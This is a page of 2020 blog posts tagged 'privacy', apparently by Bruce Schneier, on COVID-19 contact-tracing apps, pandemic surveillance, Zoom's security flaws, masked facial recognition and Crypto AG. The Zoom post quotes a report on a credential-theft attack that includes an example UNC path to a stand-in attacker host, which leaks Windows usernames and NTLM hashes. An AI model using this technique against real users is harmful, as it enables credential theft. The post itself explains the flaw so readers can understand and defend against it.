Entries Tagged "privacy"

Page 2 of 125

Me on COVID-19 Contact Tracing Apps

I was quoted in BuzzFeed:

“My problem with contact tracing apps is that they have absolutely no value,” Bruce Schneier, a privacy expert and fellow at the Berkman Klein Center for Internet & Society at Harvard University, told BuzzFeed News. “I’m not even talking about the privacy concerns, I mean the efficacy. Does anybody think this will do something useful? … This is just something governments want to do for the hell of it. To me, it’s just techies doing techie things because they don’t know what else to do.”

I haven’t blogged about this because I thought it was obvious. But from the tweets and emails I have received, it seems not.

This is a classic identification problem, and efficacy depends on two things: false positives and false negatives.

  • False positives: Any app will have a precise definition of a contact: let’s say it’s less than six feet for more than ten minutes. The false positive rate is the percentage of contacts that don’t result in transmissions. This will be because of several reasons. One, the app’s location and proximity systems — based on GPS and Bluetooth — just aren’t accurate enough to capture every contact. Two, the app won’t be aware of any extenuating circumstances, like walls or partitions. And three, not every contact results in transmission; the disease has some transmission rate that’s less than 100% (and I don’t know what that is).
  • False negatives: This is the rate the app fails to register a contact when an infection occurs. This also will be because of several reasons. One, errors in the app’s location and proximity systems. Two, transmissions that occur from people who don’t have the app (even Singapore didn’t get above a 20% adoption rate for the app). And three, not every transmission is a result of that precisely defined contact — the virus sometimes travels further.

Assume you take the app out grocery shopping with you and it subsequently alerts you of a contact. What should you do? It’s not accurate enough for you to quarantine yourself for two weeks. And without ubiquitous, cheap, fast, and accurate testing, you can’t confirm the app’s diagnosis. So the alert is useless.

Similarly, assume you take the app out grocery shopping and it doesn’t alert you of any contact. Are you in the clear? No, you’re not. You actually have no idea if you’ve been infected.

The end result is an app that doesn’t work. People will post their bad experiences on social media, and people will read those posts and realize that the app is not to be trusted. That loss of trust is even worse than having no app at all.

It has nothing to do with privacy concerns. The idea that contact tracing can be done with an app, and not human health professionals, is just plain dumb.

EDITED TO ADD: This Brookings essay makes much the same point.

EDITED TO ADD: This post has been translated into Spanish.

Posted on May 1, 2020 at 6:22 AMView Comments

How Did Facebook Beat a Federal Wiretap Demand?

This is interesting:

Facebook Inc. in 2018 beat back federal prosecutors seeking to wiretap its encrypted Messenger app. Now the American Civil Liberties Union is seeking to find out how.

The entire proceeding was confidential, with only the result leaking to the press. Lawyers for the ACLU and the Washington Post on Tuesday asked a San Francisco-based federal court of appeals to unseal the judge’s decision, arguing the public has a right to know how the law is being applied, particularly in the area of privacy.

[…]

The Facebook case stems from a federal investigation of members of the violent MS-13 criminal gang. Prosecutors tried to hold Facebook in contempt after the company refused to help investigators wiretap its Messenger app, but the judge ruled against them. If the decision is unsealed, other tech companies will likely try to use its reasoning to ward off similar government requests in the future.

Here’s the 2018 story. Slashdot thread.

Posted on April 29, 2020 at 12:29 PMView Comments

Global Surveillance in the Wake of COVID-19

OneZero is tracking thirty countries around the world who are implementing surveillance programs in the wake of COVID-19:

The most common form of surveillance implemented to battle the pandemic is the use of smartphone location data, which can track population-level movement down to enforcing individual quarantines. Some governments are making apps that offer coronavirus health information, while also sharing location information with authorities for a period of time. For instance, in early March, the Iranian government released an app that it pitched as a self-diagnostic tool. While the tool’s efficacy was likely low, given reports of asymptomatic carriers of the virus, the app saved location data of millions of Iranians, according to a Vice report.

One of the most alarming measures being implemented is in Argentina, where those who are caught breaking quarantine are being forced to download an app that tracks their location. In Hong Kong, those arriving in the airport are given electronic tracking bracelets that must be synced to their home location through their smartphone’s GPS signal.

Posted on April 24, 2020 at 6:02 AMView Comments

California Needlessly Reduces Privacy During COVID-19 Pandemic

This one isn’t even related to contact tracing:

On March 17, 2020, the federal government relaxed a number of telehealth-related regulatory requirements due to COVID-19. On April 3, 2020, California Governor Gavin Newsom issued Executive Order N-43-20 (the Order), which relaxes various telehealth reporting requirements, penalties, and enforcements otherwise imposed under state laws, including those associated with unauthorized access and disclosure of personal information through telehealth mediums.

Lots of details at the link.

Posted on April 16, 2020 at 10:34 AMView Comments

Contact Tracing COVID-19 Infections via Smartphone Apps

Google and Apple have announced a joint project to create a privacy-preserving COVID-19 contact tracing app. (Details, such as we have them, are here.) It’s similar to the app being developed at MIT, and similar to others being described and developed elsewhere. It’s nice seeing the privacy protections; they’re well thought out.

I was going to write a long essay about the security and privacy concerns, but Ross Anderson beat me to it. (Note that some of his comments are UK-specific.)

First, it isn’t anonymous. Covid-19 is a notifiable disease so a doctor who diagnoses you must inform the public health authorities, and if they have the bandwidth they call you and ask who you’ve been in contact with. They then call your contacts in turn. It’s not about consent or anonymity, so much as being persuasive and having a good bedside manner.

I’m relaxed about doing all this under emergency public-health powers, since this will make it harder for intrusive systems to persist after the pandemic than if they have some privacy theater that can be used to argue that the whizzy new medi-panopticon is legal enough to be kept running.

Second, contact tracers have access to all sorts of other data such as public transport ticketing and credit-card records. This is how a contact tracer in Singapore is able to phone you and tell you that the taxi driver who took you yesterday from Orchard Road to Raffles has reported sick, so please put on a mask right now and go straight home. This must be controlled; Taiwan lets public-health staff access such material in emergencies only.

Third, you can’t wait for diagnoses. In the UK, you only get a test if you’re a VIP or if you get admitted to hospital. Even so the results take 1-3 days to come back. While the VIPs share their status on twitter or facebook, the other diagnosed patients are often too sick to operate their phones.

Fourth, the public health authorities need geographical data for purposes other than contact tracing – such as to tell the army where to build more field hospitals, and to plan shipments of scarce personal protective equipment. There are already apps that do symptom tracking but more would be better. So the UK app will ask for the first three characters of your postcode, which is about enough to locate which hospital you’d end up in.

Fifth, although the cryptographers – and now Google and Apple – are discussing more anonymous variants of the Singapore app, that’s not the problem. Anyone who’s worked on abuse will instantly realise that a voluntary app operated by anonymous actors is wide open to trolling. The performance art people will tie a phone to a dog and let it run around the park; the Russians will use the app to run service-denial attacks and spread panic; and little Johnny will self-report symptoms to get the whole school sent home.

I recommend reading his essay in full. Also worth reading are this EFF essay, and this ACLU white paper.

To me, the real problems aren’t around privacy and security. The efficacy of any app-based contact tracing is still unproven. A “contact” from the point of view of an app isn’t the same as an epidemiological contact. And the ratio of infections to contacts is high. We would have to deal with the false positives (being close to someone else, but separated by a partition or other barrier) and the false negatives (not being close to someone else, but contracting the disease through a mutually touched object). And without cheap, fast, and accurate testing, the information from any of these apps isn’t very useful. So I agree with Ross that this is primarily an exercise in that false syllogism: Something must be done. This is something. Therefore, we must do it. It’s techies proposing tech solutions to what is primarily a social problem.

EDITED TO ADD: Susan Landau on contact tracing apps and how they’re being oversold. And Farzad Mostashari, former coordinator for health IT at the Department of Health and Human Services, on contact tracing apps.

As long as 1) every contact does not result in an infection, and 2) a large percentage of people with the disease are asymptomatic and don’t realize they have it, I can’t see how this sort of app is valuable. If we had cheap, fast, and accurate testing for everyone on demand…maybe. But I still don’t think so.

EDITED TO ADD (4/15): More details from Apple and Google.

EDITED TO ADD (4/19): Apple and Google have strengthened the security and privacy of their system.

Posted on April 13, 2020 at 6:48 AMView Comments

Security and Privacy Implications of Zoom

Over the past few weeks, Zoom’s use has exploded since it became the video conferencing platform of choice in today’s COVID-19 world. (My own university, Harvard, uses it for all of its classes. Boris Johnson had a cabinet meeting over Zoom.) Over that same period, the company has been exposed for having both lousy privacy and lousy security. My goal here is to summarize all of the problems and talk about solutions and workarounds.

In general, Zoom’s problems fall into three broad buckets: (1) bad privacy practices, (2) bad security practices, and (3) bad user configurations.

Privacy first: Zoom spies on its users for personal profit. It seems to have cleaned this up somewhat since everyone started paying attention, but it still does it.

The company collects a laundry list of data about you, including user name, physical address, email address, phone number, job information, Facebook profile information, computer or phone specs, IP address, and any other information you create or upload. And it uses all of this surveillance data for profit, against your interests.

Last month, Zoom’s privacy policy contained this bit:

Does Zoom sell Personal Data? Depends what you mean by “sell.” We do not allow marketing companies, or anyone else to access Personal Data in exchange for payment. Except as described above, we do not allow any third parties to access any Personal Data we collect in the course of providing services to users. We do not allow third parties to use any Personal Data obtained from us for their own purposes, unless it is with your consent (e.g. when you download an app from the Marketplace. So in our humble opinion, we don’t think most of our users would see us as selling their information, as that practice is commonly understood.

“Depends what you mean by ‘sell.'” “…most of our users would see us as selling…” “…as that practice is commonly understood.” That paragraph was carefully worded by lawyers to permit them to do pretty much whatever they want with your information while pretending otherwise. Do any of you who “download[ed] an app from the Marketplace” remember consenting to them giving your personal data to third parties? I don’t.

Doc Searls has been all over this, writing about the surprisingly large number of third-party trackers on the Zoom website and its poor privacy practices in general.

On March 29th, Zoom rewrote its privacy policy:

We do not sell your personal data. Whether you are a business or a school or an individual user, we do not sell your data.

[…]

We do not use data we obtain from your use of our services, including your meetings, for any advertising. We do use data we obtain from you when you visit our marketing websites, such as zoom.us and zoom.com. You have control over your own cookie settings when visiting our marketing websites.

There’s lots more. It’s better than it was, but Zoom still collects a huge amount of data about you. And note that it considers its home pages “marketing websites,” which means it’s still using third-party trackers and surveillance based advertising. (Honestly, Zoom, just stop doing it.)

Now security: Zoom’s security is at best sloppy, and malicious at worst. Motherboard reported that Zoom’s iPhone app was sending user data to Facebook, even if the user didn’t have a Facebook account. Zoom removed the feature, but its response should worry you about its sloppy coding practices in general:

“We originally implemented the ‘Login with Facebook’ feature using the Facebook SDK in order to provide our users with another convenient way to access our platform. However, we were recently made aware that the Facebook SDK was collecting unnecessary device data,” Zoom told Motherboard in a statement on Friday.

This isn’t the first time Zoom was sloppy with security. Last year, a researcher discovered that a vulnerability in the Mac Zoom client allowed any malicious website to enable the camera without permission. This seemed like a deliberate design choice: that Zoom designed its service to bypass browser security settings and remotely enable a user’s web camera without the user’s knowledge or consent. (EPIC filed an FTC complaint over this.) Zoom patched this vulnerability last year.

On 4/1, we learned that Zoom for Windows can be used to steal users’ Window credentials.

Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they’re using. The Zoom app for Windows automatically converts these so-called universal naming convention strings — such as \attacker.example.com/C$ — into clickable links. In the event that targets click on those links on networks that aren’t fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link.

On 4/2, we learned that Zoom secretly displayed data from people’s LinkedIn profiles, which allowed some meeting participants to snoop on each other. (Zoom has fixed this one.)

I’m sure lots more of these bad security decisions, sloppy coding mistakes, and random software vulnerabilities are coming.

But it gets worse. Zoom’s encryption is awful. First, the company claims that it offers end-to-end encryption, but it doesn’t. It only provides link encryption, which means everything is unencrypted on the company’s servers. From the Intercept:

In Zoom’s white paper, there is a list of “pre-meeting security capabilities” that are available to the meeting host that starts with “Enable an end-to-end (E2E) encrypted meeting.” Later in the white paper, it lists “Secure a meeting with E2E encryption” as an “in-meeting security capability” that’s available to meeting hosts. When a host starts a meeting with the “Require Encryption for 3rd Party Endpoints” setting enabled, participants see a green padlock that says, “Zoom is using an end to end encrypted connection” when they mouse over it.

But when reached for comment about whether video meetings are actually end-to-end encrypted, a Zoom spokesperson wrote, “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

They’re also lying about the type of encryption. On 4/3, Citizen Lab reported

Zoom documentation claims that the app uses “AES-256” encryption for meetings where possible. However, we find that in each Zoom meeting, a single AES-128 key is used in ECB mode by all participants to encrypt and decrypt audio and video. The use of ECB mode is not recommended because patterns present in the plaintext are preserved during encryption.

The AES-128 keys, which we verified are sufficient to decrypt Zoom packets intercepted in Internet traffic, appear to be generated by Zoom servers, and in some cases, are delivered to participants in a Zoom meeting through servers in China, even when all meeting participants, and the Zoom subscriber’s company, are outside of China.

I’m okay with AES-128, but using ECB (electronic codebook) mode indicates that there is no one at the company who knows anything about cryptography.

And that China connection is worrisome. Citizen Lab again:

Zoom, a Silicon Valley-based company, appears to own three companies in China through which at least 700 employees are paid to develop Zoom’s software. This arrangement is ostensibly an effort at labor arbitrage: Zoom can avoid paying US wages while selling to US customers, thus increasing their profit margin. However, this arrangement may make Zoom responsive to pressure from Chinese authorities.

Or from Chinese programmers slipping backdoors into the code at the request of the government.

Finally, bad user configuration. Zoom has a lot of options. The defaults aren’t great, and if you don’t configure your meetings right you’re leaving yourself open to all sort of mischief.

Zoombombing” is the most visible problem. People are finding open Zoom meetings, classes, and events: joining them, and sharing their screens to broadcast offensive content — porn, mostly — to everyone. It’s awful if you’re the victim, and a consequence of allowing any participant to share their screen.

Even without screen sharing, people are logging in to random Zoom meetings and disrupting them. Turns out that Zoom didn’t make the meeting ID long enough to prevent someone from randomly trying them, looking for meetings. This isn’t new; Checkpoint Research reported this last summer. Instead of making the meeting IDs longer or more complicated — which it should have done — it enabled meeting passwords by default. Of course most of us don’t use passwords, and there are now automatic tools for finding Zoom meetings.

For help securing your Zoom sessions, Zoom has a good guide. Short summary: don’t share the meeting ID more than you have to, use a password in addition to a meeting ID, use the waiting room if you can, and pay attention to who has what permissions.

That’s what we know about Zoom’s privacy and security so far. Expect more revelations in the weeks and months to come. The New York Attorney General is investigating the company. Security researchers are combing through the software, looking for other things Zoom is doing and not telling anyone about. There are more stories waiting to be discovered.

Zoom is a security and privacy disaster, but until now had managed to avoid public accountability because it was relatively obscure. Now that it’s in the spotlight, it’s all coming out. (Their 4/1 response to all of this is here.) On 4/2, the company said it would freeze all feature development and focus on security and privacy. Let’s see if that’s anything more than a PR move.

In the meantime, you should either lock Zoom down as best you can, or — better yet — abandon the platform altogether. Jitsi is a distributed, free, and open-source alternative. Start your meeting here.

EDITED TO ADD: Fight for the Future is on this.

Steve Bellovin’s comments.

Meanwhile, lots of Zoom video recordings are available on the Internet. The article doesn’t have any useful details about how they got there:

Videos viewed by The Post included one-on-one therapy sessions; a training orientation for workers doing telehealth calls, which included people’s names and phone numbers; small-business meetings, which included private company financial statements; and elementary-school classes, in which children’s faces, voices and personal details were exposed.

Many of the videos include personally identifiable information and deeply intimate conversations, recorded in people’s homes. Other videos include nudity, such as one in which an aesthetician teaches students how to give a Brazilian wax.

[…]

Many of the videos can be found on unprotected chunks of Amazon storage space, known as buckets, which are widely used across the Web. Amazon buckets are locked down by default, but many users make the storage space publicly accessible either inadvertently or to share files with other people.

EDITED TO ADD (4/4): New York City has banned Zoom from its schools.

EDITED TO ADD: This post has been translated into Spanish.

Posted on April 3, 2020 at 10:10 AMView Comments

Privacy vs. Surveillance in the Age of COVID-19

The trade-offs are changing:

As countries around the world race to contain the pandemic, many are deploying digital surveillance tools as a means to exert social control, even turning security agency technologies on their own civilians. Health and law enforcement authorities are understandably eager to employ every tool at their disposal to try to hinder the virus ­ even as the surveillance efforts threaten to alter the precarious balance between public safety and personal privacy on a global scale.

Yet ratcheting up surveillance to combat the pandemic now could permanently open the doors to more invasive forms of snooping later.

I think the effects of COVID-19 will be more drastic than the effects of the terrorist attacks of 9/11: not only with respect to surveillance, but across many aspects of our society. And while many things that would never be acceptable during normal time are reasonable things to do right now, we need to makes sure we can ratchet them back once the current pandemic is over.

Cindy Cohn at EFF wrote:

We know that this virus requires us to take steps that would be unthinkable in normal times. Staying inside, limiting public gatherings, and cooperating with medically needed attempts to track the virus are, when approached properly, reasonable and responsible things to do. But we must be as vigilant as we are thoughtful. We must be sure that measures taken in the name of responding to COVID-19 are, in the language of international human rights law, “necessary and proportionate” to the needs of society in fighting the virus. Above all, we must make sure that these measures end and that the data collected for these purposes is not re-purposed for either governmental or commercial ends.

I worry that in our haste and fear, we will fail to do any of that.

More from EFF.

Posted on March 30, 2020 at 6:32 AMView Comments

Facial Recognition for People Wearing Masks

The Chinese facial recognition company Hanwang claims it can recognize people wearing masks:

The company now says its masked facial recognition program has reached 95 percent accuracy in lab tests, and even claims that it is more accurate in real life, where its cameras take multiple photos of a person if the first attempt to identify them fails.

[…]

Counter-intuitively, training facial recognition algorithms to recognize masked faces involves throwing data away. A team at the University of Bradford published a study last year showing they could train a facial recognition program to accurately recognize half-faces by deleting parts of the photos they used to train the software.

When a facial recognition program tries to recognize a person, it takes a photo of the person to be identified, and reduces it down to a bundle, or vector, of numbers that describes the relative positions of features on the face.

[…]

Hanwang’s system works for masked faces by trying to guess what all the faces in its existing database of photographs would look like if they were masked.

Posted on March 25, 2020 at 6:33 AMView Comments

Emergency Surveillance During COVID-19 Crisis

Israel is using emergency surveillance powers to track people who may have COVID-19, joining China and Iran in using mass surveillance in this way. I believe pressure will increase to leverage existing corporate surveillance infrastructure for these purposes in the US and other countries. With that in mind, the EFF has some good thinking on how to balance public safety with civil liberties:

Thus, any data collection and digital monitoring of potential carriers of COVID-19 should take into consideration and commit to these principles:

  • Privacy intrusions must be necessary and proportionate. A program that collects, en masse, identifiable information about people must be scientifically justified and deemed necessary by public health experts for the purpose of containment. And that data processing must be proportionate to the need. For example, maintenance of 10 years of travel history of all people would not be proportionate to the need to contain a disease like COVID-19, which has a two-week incubation period.
  • Data collection based on science, not bias. Given the global scope of communicable diseases, there is historical precedent for improper government containment efforts driven by bias based on nationality, ethnicity, religion, and race­ — rather than facts about a particular individual’s actual likelihood of contracting the virus, such as their travel history or contact with potentially infected people. Today, we must ensure that any automated data systems used to contain COVID-19 do not erroneously identify members of specific demographic groups as particularly susceptible to infection.
  • Expiration. As in other major emergencies in the past, there is a hazard that the data surveillance infrastructure we build to contain COVID-19 may long outlive the crisis it was intended to address. The government and its corporate cooperators must roll back any invasive programs created in the name of public health after crisis has been contained.
  • Transparency. Any government use of “big data” to track virus spread must be clearly and quickly explained to the public. This includes publication of detailed information about the information being gathered, the retention period for the information, the tools used to process that information, the ways these tools guide public health decisions, and whether these tools have had any positive or negative outcomes.
  • Due Process. If the government seeks to limit a person’s rights based on this “big data” surveillance (for example, to quarantine them based on the system’s conclusions about their relationships or travel), then the person must have the opportunity to timely and fairly challenge these conclusions and limits.

Posted on March 20, 2020 at 6:25 AMView Comments

More on Crypto AG

One follow-on to the story of Crypto AG being owned by the CIA: this interview with a Washington Post reporter. The whole thing is worth reading or listening to, but I was struck by these two quotes at the end:

…in South America, for instance, many of the governments that were using Crypto machines were engaged in assassination campaigns. Thousands of people were being disappeared, killed. And I mean, they’re using Crypto machines, which suggests that the United States intelligence had a lot of insight into what was happening. And it’s hard to look back at that history now and see a lot of evidence of the United States going to any real effort to stop it or at least or even expose it.

[…]

To me, the history of the Crypto operation helps to explain how U.S. spy agencies became accustomed to, if not addicted to, global surveillance. This program went on for more than 50 years, monitoring the communications of more than 100 countries. I mean, the United States came to expect that kind of penetration, that kind of global surveillance capability. And as Crypto became less able to deliver it, the United States turned to other ways to replace that. And the Snowden documents tell us a lot about how they did that.

Posted on March 6, 2020 at 7:48 AMView Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.